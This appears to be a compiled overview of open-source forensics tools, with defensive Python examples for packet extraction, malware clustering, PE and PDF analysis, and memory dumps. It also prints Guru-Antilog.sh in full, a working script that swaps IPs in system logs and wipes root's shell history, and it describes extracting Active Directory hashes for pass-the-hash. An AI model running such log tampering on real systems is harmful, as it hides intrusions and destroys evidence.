Forensics

PlainSight

PlainSight is a versatile computer forensics environment that allows inexperienced forensic practitioners to perform common tasks using powerful open source tools. It takes well-known open source forensic/security tools, customizes them, and combines them with an intuitive user interface to create a powerful forensic environment.

With PlainSight you can perform operations such as:

Get hard disk and partition information
Extract user and group information
View Internet histories
Examine Windows firewall configuration
Discover recent documents
Recover/Carve over 15 different file types
Discover USB storage information
Examine physical memory dumps
Examine UserAssist information
Extract LanMan password hashes
Preview a system before acquiring it

Volatility

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated, yet offer visibility into the runtime state of that system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work in this area of research.

Digital Forensics Framework

DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation, so that both professionals and non-experts can quickly and easily conduct digital investigations and perform incident response.

NTDSXtract

Overview:
Technically a forensics framework for analyzing NTDS.dit files (the Active Directory database). In practice it is mostly used to extract password hashes from NTDS.dit, which can then be used for pass-the-hash or cracking. The hashes are stored encrypted under a key derived from the SYSTEM hive's boot key, so the SYSTEM hive has to be collected together with NTDS.dit, which is why the tutorial below grabs both from a volume shadow copy.

Tutorials:
Dumping a volume shadow copy and extracting - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/

Guru-Antilog.sh

An anti-forensics bash script that replaces your real IP with a fake one in Unix log files (lastlog, syslog, messages and the Apache access_log) and wipes /root/.bash_history. Two caveats worth knowing if you ever have to detect its use: /var/log/lastlog is a binary file of fixed-size records, so running sed over it with a replacement of a different length corrupts every record after the edit rather than editing it, and each log is replaced via mv, which gives the file a new inode and a fresh ctime.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ]; then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
exit 1    # the original carried on here; as non-root every mv below simply fails
fi
echo -n " What's the ip y0 want to spoof it ?  "
read -r word
echo -n " What's the Fake ip y0 want  using it ? "
read -r fake
# escape the dots: unescaped, "10.0.0.5" is a regex in which "." matches any byte
pattern=$(printf '%s' "$word" | sed 's/\./\\./g')

# replace every occurrence of the real IP in one log file (skipped if the file is missing)
swap_ip() {
    log="$1"
    if [ ! -f "$log" ]; then
        echo " i can't find $log"
        return
    fi
    echo " Editing $log"
    sed "s/$pattern/$fake/g" "$log" > "$log.new"
    # mv swaps in a new inode: the replaced log gets a fresh ctime, itself a tamper indicator
    mv "$log.new" "$log"
}

# /var/log/lastlog is binary (fixed-size records, one per uid): sed leaves it readable only
# if the fake IP has exactly the same length as the real one
swap_ip /var/log/lastlog
swap_ip /var/log/syslog
swap_ip /var/log/messages
swap_ip /var/log/httpd/access_log
# wipe root's shell history, as described above
: > /root/.bash_history
OpenFPC

OpenFPC is a set of scripts that combine to provide a lightweight full-packet network traffic recorder and buffering tool. Its design goal is to allow non-expert users to deploy a distributed network traffic recorder on COTS hardware while integrating with existing alert and log tools.

OpenFPC is described as lightweight because it follows a different design model to other FPC/network traffic forensic tools that I have seen. It doesn't provide the user with the ability to trigger automatic events (IDS-like functions), or watch for anomalous traffic changes (NBA-like functions), as it is assumed that external open source or commercial tools already provide this detection capability. OpenFPC fits in as a companion that provides extra (full packet/traffic stream) data as a bolt-on to these tools, allowing deeper analysis of event data where required.

Simply give it a logfile entry in one of the supported formats, and it will provide you with the PCAP.

For more information, visit the OpenFPC project home at http://www.openfpc.org
Features and futures

Automated install on Debian and RH style distributions
Extraction of single streams based on event occurrence time, or start/end timestamps
Extracts stream data based on common logfile/alert formats
Distributed collection with central extraction
Optional compression and extract checksums
Ability to request data from external tools/user interfaces
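What "give it a logfile entry and it provides the PCAP" involves in practice, as an added example in Python (not OpenFPC's own code): parse one Snort fast-format alert line into a flow and timestamp, build a direction-agnostic BPF filter, pick the ring-buffer files that overlap a time window around the event, and emit the tcpdump invocations that carve the stream out. The buffer listing and the alert lines are constructed; the year is supplied by the caller because the fast format does not carry one.

```python
import re
from datetime import datetime, timedelta

# Snort "fast" alert: "MM/DD-HH:MM:SS.usec  [**] [gid:sid:rev] msg [**] [Classification: ..] [Priority: n] {PROTO} src[:port] -> dst[:port]"
SNORT_FAST = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+\[(?P<sid>[\d:]+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<sip>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dip>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Constructed ring buffer listing (file name, time of its first packet) and alerts; not real captures.
BUFFERS = [
    ("buffer.0", datetime(2024, 3, 14, 10, 0, 0)),
    ("buffer.1", datetime(2024, 3, 14, 10, 10, 0)),
    ("buffer.2", datetime(2024, 3, 14, 10, 20, 0)),
]
ALERT = ("03/14-10:15:30.123456  [**] [1:2100498:7] GPL ATTACK_RESPONSE id check returned root [**] "
         "[Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.5:80 -> 10.0.0.2:51234")


def parse_snort_fast(line, year):
    """Fast format has no year; the caller supplies it (assumption: alert and capture fall in the same year)."""
    m = SNORT_FAST.match(line)
    if not m:
        raise ValueError("not a Snort fast alert line")
    when = datetime.strptime(f"{year}/{m['ts']}", "%Y/%m/%d-%H:%M:%S.%f")
    return {"time": when, "sid": m["sid"], "msg": m["msg"], "proto": m["proto"].lower(),
            "sip": m["sip"], "sport": m["sport"], "dip": m["dip"], "dport": m["dport"]}


def bpf_filter(ev):
    """Filter matching both directions of the flow; ports are omitted for ICMP-style events that have none."""
    parts = [ev["proto"], f"host {ev['sip']}", f"host {ev['dip']}"]
    if ev["sport"] and ev["dport"]:
        parts += [f"port {ev['sport']}", f"port {ev['dport']}"]
    return " and ".join(parts)


def time_window(ev, before=60, after=60):
    """Event-time extraction: a window of N seconds either side of the alert timestamp."""
    return ev["time"] - timedelta(seconds=before), ev["time"] + timedelta(seconds=after)


def buffers_in_window(buffers, start, end):
    """buffers is ordered; file i covers [t_i, t_{i+1}). Returns the files overlapping [start, end]."""
    chosen = []
    for i, (name, t0) in enumerate(buffers):
        t1 = buffers[i + 1][1] if i + 1 < len(buffers) else datetime.max
        if t0 <= end and t1 > start:
            chosen.append(name)
    return chosen


def extraction_plan(line, buffers, year, out="extract"):
    """From one alert line to the tcpdump commands that pull the flow out of the buffer files."""
    ev = parse_snort_fast(line, year)
    start, end = time_window(ev)
    files = buffers_in_window(buffers, start, end)
    filt = bpf_filter(ev)
    cmds = [f"tcpdump -nn -r {f} -w {out}.{i}.pcap '{filt}'" for i, f in enumerate(files)]
    return {"event": ev, "window": (start, end), "files": files, "filter": filt, "commands": cmds}


if __name__ == "__main__":
    plan = extraction_plan(ALERT, BUFFERS, 2024)
    print(plan["window"], plan["files"])
    for c in plan["commands"]:
        print(c)
```

Selecting buffer files by time only narrows the search; tcpdump still reads each selected file in full, so the per-file cost is what the "optimal configuration for extraction speed" item in the TODO list is about.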
TODO

Central web-based UI for stream/data extraction from distributed remote storage buffers
Automatic calculation of an optimal configuration for extraction speed based on available storage.

Malheur Malware Analyzer

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior in various formats, as long as the monitored events are separated by delimiter symbols, for example as in the reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.

Extraction of prototypes. From a given set of reports, Malheur identifies a subset of prototypes representative for the full data set. The prototypes provide a quick overview of recorded behavior and can be used to guide manual inspection.

Clustering of behavior. Malheur automatically identifies groups (clusters) of reports containing similar behavior. Clustering allows for discovering novel classes of malware and provides the basis for crafting specific detection and defense mechanisms, such as anti-virus signatures.

Classification of behavior. Based on a set of previously clustered reports, Malheur is able to assign unknown behavior to known groups of malware. Classification enables identifying novel variants of malware and can be used to filter program behavior prior to manual inspection.
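The three steps above (prototype extraction, clustering, classification) carried through on delimiter-separated behavior reports, as an added example in Python that is not Malheur's own code. It embeds each report as a unit vector over event bigrams, selects prototypes greedily (farthest-point, seeded with the first report where Malheur seeds at random), clusters the prototypes with complete linkage, and assigns new reports to the nearest prototype with a rejection distance for unknown behavior. The reports, thresholds and the "name before the colon" feature level are constructed for the example.

```python
import math
from collections import Counter

# Constructed sandbox reports: events separated by ';', each "name:argument".
# Only the event name is used for features here (the coarsest detail level).
REPORTS = {
    "key_a": "load_dll:user32;set_hook:WH_KEYBOARD;create_file:keys.log;write_file:keys.log;connect:c2;send:keys.log",
    "key_b": "load_dll:user32;set_hook:WH_KEYBOARD;create_file:keys.log;write_file:keys.log;sleep:5;connect:c2;send:keys.log",
    "drop_a": "create_file:tmp.exe;write_file:tmp.exe;create_process:tmp.exe;reg_set:Run;delete_file:self",
    "drop_b": "create_file:svc.exe;write_file:svc.exe;create_process:svc.exe;reg_set:Run;delete_file:self",
    "svc_a": "open_scm;create_service:svc;start_service:svc;connect:update;recv;write_file:cfg",
}


def embed(report, n=2, delim=";"):
    """Report -> unit-length vector over event n-grams (the bag-of-n-grams view of behaviour)."""
    events = [e.split(":", 1)[0] for e in report.split(delim) if e]
    counts = Counter(tuple(events[i:i + n]) for i in range(len(events) - n + 1))
    norm = math.sqrt(sum(c * c for c in counts.values()))
    return {g: c / norm for g, c in counts.items()} if norm else {}


def distance(a, b):
    """Euclidean distance between unit vectors, sqrt(2 - 2*cos): 0 identical, sqrt(2) nothing in common."""
    dot = sum(v * b.get(g, 0.0) for g, v in a.items())
    return math.sqrt(max(0.0, 2.0 - 2.0 * dot))


def extract_prototypes(vecs, max_dist):
    """Greedy selection: keep taking the vector farthest from every prototype chosen so far
    until each vector has a prototype within max_dist."""
    protos = [0]
    nearest = [distance(v, vecs[0]) for v in vecs]
    while True:
        far = max(range(len(vecs)), key=lambda i: nearest[i])
        if nearest[far] <= max_dist:
            return protos
        protos.append(far)
        nearest = [min(d, distance(v, vecs[far])) for d, v in zip(nearest, vecs)]


def cluster_prototypes(vecs, protos, max_dist):
    """Complete-linkage agglomerative clustering of the prototypes, stopping when the closest pair exceeds max_dist."""
    clusters = [[p] for p in protos]
    while len(clusters) > 1:
        best = min(((max(distance(vecs[i], vecs[j]) for i in a for j in b), ia, ib)
                    for ia, a in enumerate(clusters) for ib, b in enumerate(clusters) if ia < ib))
        if best[0] > max_dist:
            break
        _, ia, ib = best
        clusters = [c for k, c in enumerate(clusters) if k not in (ia, ib)] + [clusters[ia] + clusters[ib]]
    return clusters


def classify(vec, vecs, clusters, reject_dist):
    """Cluster of the nearest prototype, or None when nothing known is within reject_dist."""
    best = min((distance(vec, vecs[p]), cid) for cid, c in enumerate(clusters) for p in c)
    return best[1] if best[0] <= reject_dist else None


def run(reports, proto_dist=0.5, cluster_dist=0.8):
    """Full pipeline over a report set; labels every report by the cluster of its nearest prototype."""
    names = list(reports)
    vecs = [embed(reports[n]) for n in names]
    protos = extract_prototypes(vecs, proto_dist)
    clusters = cluster_prototypes(vecs, protos, cluster_dist)
    labels = {n: classify(v, vecs, clusters, float("inf")) for n, v in zip(names, vecs)}
    return {"prototypes": [names[p] for p in protos], "clusters": clusters, "labels": labels, "vecs": vecs}


if __name__ == "__main__":
    result = run(REPORTS)
    print(result["prototypes"], result["labels"])
    unknown = embed("create_mutex:x;find_window:y;sleep:1")
    print(classify(unknown, result["vecs"], result["clusters"], reject_dist=0.8))
```

The reject distance is what turns classification into a filter: a sample that lands near no prototype is surfaced for manual inspection instead of being forced into an existing class.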

Hook Analyser Malware Tool

Malware Analyser (Hook Analyser) is a freeware tool to perform static and dynamic analysis of malware.
Author: Beenu Arora

The features are:
String-based analysis for registry keys, API calls, IRC commands, DLLs called and VM-aware code.
Display of detailed PE headers with all section details, import and export symbols, etc.
On Linux distributions, it can perform an ASCII dump of the PE along with other options (check the --help argument).

For Windows, it can display the various sections of a PE: DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections
ASCII dump on Windows machines.
Code analysis (disassembling)
Online malware checking (www.virustotal.com)
Check for packers against the packer database.

Tracer functionality: can be used to identify
anti-debugging tricks, file system manipulation calls, rootkit hooks, keyboard hooks, DEP setting changes and network identification traces.

Signature creation: allows creating signatures for malware.
Batch mode scan to scan all DLLs and EXEs in directories and sub-directories
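The static side of the feature list (PE header and section table parsing, packer check by section name, string-based indicator scan) as an added example in Python; this is not Hook Analyser's code and the packer table and indicator strings are a small constructed stand-in for the tool's database. The sample PE is built in memory from the documented header layouts (DOS header, PE signature, COFF file header, optional header, section table) and is not an executable program.

```python
import math
import struct

# Section names well-known packers leave behind (constructed stand-in for a packer database)
PACKER_SECTIONS = {"UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX", ".aspack": "ASPack", ".adata": "ASPack", ".petite": "Petite"}

# Indicator strings grouped the way the string-based analysis reports them (constructed list)
INDICATORS = {
    "network_api": [b"InternetOpenA", b"URLDownloadToFileA", b"WSAStartup"],
    "injection_api": [b"CreateRemoteThread", b"WriteProcessMemory", b"VirtualAllocEx"],
    "hook_api": [b"SetWindowsHookExA", b"SetWindowsHookExW"],
    "registry": [b"RegSetValueExA", b"CurrentVersion\\Run"],
    "irc": [b"PRIVMSG", b"NICK ", b"JOIN #"],
    "vm_aware": [b"VMware", b"VBoxService", b"vmtoolsd"],
    "anti_debug": [b"IsDebuggerPresent", b"CheckRemoteDebuggerPresent"],
}
COFF_FMT = "<HHIIIHH"          # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def entropy(buf):
    """Shannon entropy in bits per byte; packed or encrypted sections sit close to 8."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)


def parse_pe(data):
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, timestamp, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    opt_magic, = struct.unpack_from("<H", data, opt_off)       # 0x10B PE32, 0x20B PE32+
    entry, = struct.unpack_from("<I", data, opt_off + 16)      # AddressOfEntryPoint (RVA), same offset in both
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, data, opt_off + opt_size + 40 * i)
        name, vsize, vaddr, rawsize, rawptr, schars = f[0], f[1], f[2], f[3], f[4], f[9]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "chars": schars,
                         "entropy": entropy(data[rawptr:rawptr + rawsize])})
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars,
            "opt_magic": opt_magic, "entry": entry, "sections": sections}


def entry_section(pe):
    """Section containing the entry point; packers typically place it in a late, high-entropy section."""
    for s in pe["sections"]:
        if s["vaddr"] <= pe["entry"] < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def detect_packer(pe):
    for s in pe["sections"]:
        if s["name"] in PACKER_SECTIONS:
            return PACKER_SECTIONS[s["name"]]
    return None


def scan_strings(data):
    """String-based analysis: which indicator strings occur anywhere in the file, by category."""
    return {cat: [ind.decode() for ind in inds if ind in data] for cat, inds in INDICATORS.items()}


def build_sample_pe():
    """Constructed minimal PE32 (not a runnable program): UPX-style section names, entry point in UPX1,
    and raw section data carrying a few tell-tale strings."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                   # e_lfanew
    coff = struct.pack(COFF_FMT, 0x14C, 2, 0x5F000000, 0, 0, 224, 0x0102)   # i386, 2 sections, PE32 opt hdr, EXE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2010)                                 # entry point inside UPX1
    raw = b"\0".join([b"SetWindowsHookExA", b"CreateRemoteThread", b"PRIVMSG", b"VMware", b"\\CurrentVersion\\Run"]) + b"\0"
    raw = raw.ljust(0x200, b"\0")
    sec0 = struct.pack(SECTION_FMT, b"UPX0", 0x1000, 0x1000, 0, 0, 0, 0, 0, 0, 0xE0000080)
    sec1 = struct.pack(SECTION_FMT, b"UPX1", 0x1000, 0x2000, len(raw), 0x200, 0, 0, 0, 0, 0xE0000040)
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec0 + sec1).ljust(0x200, b"\0")
    return header + raw


if __name__ == "__main__":
    sample = build_sample_pe()
    pe = parse_pe(sample)
    print(hex(pe["machine"]), [(s["name"], round(s["entropy"], 2)) for s in pe["sections"]])
    print("entry in", entry_section(pe), "packer:", detect_packer(pe))
    print({k: v for k, v in scan_strings(sample).items() if v})
```

Name-based packer detection is only a first pass: packers that rename sections, or a sample that was packed and then had its section names edited, are better caught by the entry-point-in-high-entropy-section combination this parser also exposes.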

Recent updates:
--Added Traces signatures
--Improved parsing
--Added ThreatExpert for online scanning option
--Packed libraries onto single executable
--Improved Traces signatures

peepdf

peepdf is a Python tool to explore PDF files in order to find out whether the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to do all the tasks. With peepdf it's possible to see all the objects in the document with the suspicious elements highlighted; it supports the most used filters and encodings, and it can parse different versions of a file, object streams and encrypted files. With the installation of PyV8 and Pylibemu it provides JavaScript and shellcode analysis wrappers too. Apart from this it's able to create new PDF files and to modify/obfuscate existing ones.

The main functionalities of peepdf are the following:

Analysis:
Decodings: hexadecimal, octal, name objects
Most used filters
References in objects and where an object is referenced
Strings search (including streams)
Physical structure (offsets)
Logical tree structure
Metadata
Modifications between versions (changelog)
Compressed objects (object streams)
Analysis and modification of Javascript (Spidermonkey): unescape, replace, join
Shellcode analysis (Libemu python wrapper, pylibemu)
Variables (set command)
Extraction of old versions of the document
Easy extraction of objects, Javascript code, shellcodes (>, >>, $>, $>>)
Checking hashes on VirusTotal

Creation/Modification:
Basic PDF creation
Creation of PDF with Javascript executed when the document is opened
Creation of object streams to compress objects
Embedded PDFs
Strings and names obfuscation
Malformed PDF output: without endobj, garbage in the header, bad header...
Filters modification
Objects modification

Execution modes:
Simple command line execution
Powerful interactive console (colorized or not)
Batch mode

TODO:
Embedded PDFs analysis
Improving automatic Javascript analysis
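What several of the analysis features above amount to at the byte level (object enumeration, reference map, FlateDecode, name de-obfuscation, suspicious-element flagging, and extracting the JavaScript behind an /OpenAction), as an added example in Python that is not peepdf's code. It handles the common direct-object, direct-/Length case only (no xref parsing, object streams or indirect lengths), and the sample PDF is constructed in the block, with /OpenAction written as /Open#41ction to show why names must be decoded before keyword checks.

```python
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)   # lazy: assumes 'endobj' does not occur inside stream data
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R\b")
# Keys/names flagged as suspicious elements (a subset, for the example)
SUSPICIOUS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile", b"/RichMedia", b"/AcroForm"]


def decode_names(dictionary):
    """Undo #xx name obfuscation (/Open#41ction -> /OpenAction) so keyword checks cannot be evaded that way."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), dictionary)


def split_stream(body):
    """Separate dictionary from stream data using /Length rather than searching for 'endstream'
    (binary stream data may legitimately contain that word)."""
    m = re.search(rb"\bstream\r?\n", body)
    if not m:
        return body, None
    dictionary = body[:m.start()]
    lm = re.search(rb"/Length\s+(\d+)(?!\s+\d+\s+R)", dictionary)   # direct /Length only
    data = body[m.end():]
    if lm:
        return dictionary, data[:int(lm.group(1))]
    return dictionary, data[:data.rfind(b"endstream")].rstrip(b"\r\n")


def parse_objects(pdf):
    """Physical pass over the file: every 'N G obj ... endobj', its (decoded) dictionary, stream and outgoing references."""
    objects = {}
    for m in OBJ_RE.finditer(pdf):
        dictionary, stream = split_stream(m.group(3))
        dictionary = decode_names(dictionary)
        if stream is not None and b"/FlateDecode" in dictionary:
            try:
                stream = zlib.decompress(stream)
            except zlib.error:
                pass   # keep the raw bytes; a broken filter is itself worth reporting
        objects[int(m.group(1))] = {"dict": dictionary.strip(), "stream": stream,
                                    "refs": [int(r) for r in REF_RE.findall(dictionary)]}
    return objects


def referenced_by(objects):
    """Inverse reference map: which objects point at each object."""
    rev = {n: [] for n in objects}
    for n, o in objects.items():
        for r in o["refs"]:
            rev.setdefault(r, []).append(n)
    return rev


def suspicious_elements(objects):
    found = {}
    for n, o in objects.items():
        hits = [k.decode() for k in SUSPICIOUS if re.search(re.escape(k) + rb"\b", o["dict"])]
        if hits:
            found[n] = hits
    return found


def ref_for(dictionary, key):
    m = re.search(re.escape(key) + rb"\s+(\d+)\s+\d+\s+R\b", dictionary)
    return int(m.group(1)) if m else None


def extract_open_action_js(objects):
    """Follow Catalog /OpenAction -> action object /JS -> stream (or inline string): the 'JavaScript on open' chain."""
    for o in objects.values():
        action = ref_for(o["dict"], b"/OpenAction")
        if action is None:
            continue
        act = objects[action]["dict"]
        js_ref = ref_for(act, b"/JS")
        if js_ref is not None:
            return objects[js_ref]["stream"]
        m = re.search(rb"/JS\s*\((.*?)\)", act, re.S)
        return m.group(1) if m else None
    return None


def build_sample_pdf():
    """Constructed sample (harmless, not from peepdf): JS run on open, stored Flate-compressed, with an obfuscated name."""
    js = b"app.alert('constructed sample');"
    comp = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(comp) + comp + b"\nendstream",
    ]
    body = b"".join(b"%d 0 obj\n%s\nendobj\n" % (i + 1, o) for i, o in enumerate(objs))
    return b"%PDF-1.4\n" + body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    objs = parse_objects(build_sample_pdf())
    print(suspicious_elements(objs))
    print(referenced_by(objs))
    print(extract_open_action_js(objs))
```

Scanning the raw file for "N G obj" rather than trusting the xref table is deliberate: malformed PDFs (bad headers, missing endobj, garbage before the header) are a listed peepdf feature precisely because readers recover from them, so an analyser has to find objects the same forgiving way.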

LiME Forensics

LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports acquiring memory either to the file system of the device or over the network. LiME is unique in that it is the first tool that allows full memory captures from Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.
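A LiME capture is a sequence of ranges, each preceded by a small header, and the first thing any memory analysis framework (Volatility's LiME address-space layer, for instance) does with it is rebuild the physical-address-to-file-offset map. The following is an added example in Python, not LiME's or Volatility's code; it assumes the header layout as I understand it from lime.h (u32 magic 0x4C694D45, u32 version 1, u64 start, u64 inclusive end, 8 reserved bytes) and builds a constructed two-range dump with a fake kernel banner in it.

```python
import struct

# LiME range header (assumption, check lime.h of the version you use): magic "LiME" as a little-endian u32,
# version 1, u64 start and inclusive end physical address, 8 reserved bytes, then the raw bytes of that range.
# One header per "System RAM" range; the gaps between ranges are holes (device memory) that are not captured.
LIME_MAGIC = 0x4C694D45
HEADER = struct.Struct("<IIQQ8s")


def build_sample_dump(ranges):
    """Constructed dump from (start_paddr, bytes) pairs."""
    out = b""
    for start, content in ranges:
        out += HEADER.pack(LIME_MAGIC, 1, start, start + len(content) - 1, b"\0" * 8) + content
    return out


def parse_lime(dump):
    """Walk the headers and build the range map; detects a capture that was cut short mid-range."""
    ranges, off = [], 0
    while off < len(dump):
        if off + HEADER.size > len(dump):
            raise ValueError(f"truncated header at file offset {off:#x}")
        magic, version, start, end, _ = HEADER.unpack_from(dump, off)
        if magic != LIME_MAGIC or version != 1:
            raise ValueError(f"bad LiME header at file offset {off:#x}")
        size = end - start + 1
        if off + HEADER.size + size > len(dump):
            raise ValueError(f"range {start:#x}-{end:#x} runs past end of file (truncated capture)")
        ranges.append({"start": start, "end": end, "file_offset": off + HEADER.size})
        off += HEADER.size + size
    return ranges


def read_physical(dump, ranges, paddr, length):
    """Bytes at a physical address, clipped at the end of its range; None if the address lies in a hole."""
    for r in ranges:
        if r["start"] <= paddr <= r["end"]:
            fo = r["file_offset"] + (paddr - r["start"])
            return dump[fo:fo + min(length, r["end"] - paddr + 1)]
    return None


def find_physical(dump, ranges, needle):
    """Physical addresses of every occurrence of needle, e.g. the 'Linux version ...' banner used to profile a dump."""
    hits = []
    for r in ranges:
        blob = dump[r["file_offset"]:r["file_offset"] + (r["end"] - r["start"] + 1)]
        pos = blob.find(needle)
        while pos != -1:
            hits.append(r["start"] + pos)
            pos = blob.find(needle, pos + 1)
    return hits


# Constructed sample: two RAM ranges with a hole between them; the banner is not from a real kernel.
BANNER = b"Linux version 5.10.0-example (constructed sample, not a real kernel)"
SAMPLE = build_sample_dump([
    (0x1000, b"\x00" * 0x100 + b"swapper/0" + b"\x00" * 0xF7),
    (0x100000, b"\xAA" * 0x40 + BANNER + b"\x00" * 0x40),
])


if __name__ == "__main__":
    ranges = parse_lime(SAMPLE)
    print([(hex(r["start"]), hex(r["end"])) for r in ranges])
    print(find_physical(SAMPLE, ranges, b"Linux version"))
    print(read_physical(SAMPLE, ranges, 0x1100, 9), read_physical(SAMPLE, ranges, 0x5000, 4))
```

Because the end address is stored in each header, a capture interrupted by a crash or a dropped network connection is detectable by the last range running past end-of-file, which is worth checking before spending time on a dump that will never contain the artifact you are after.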
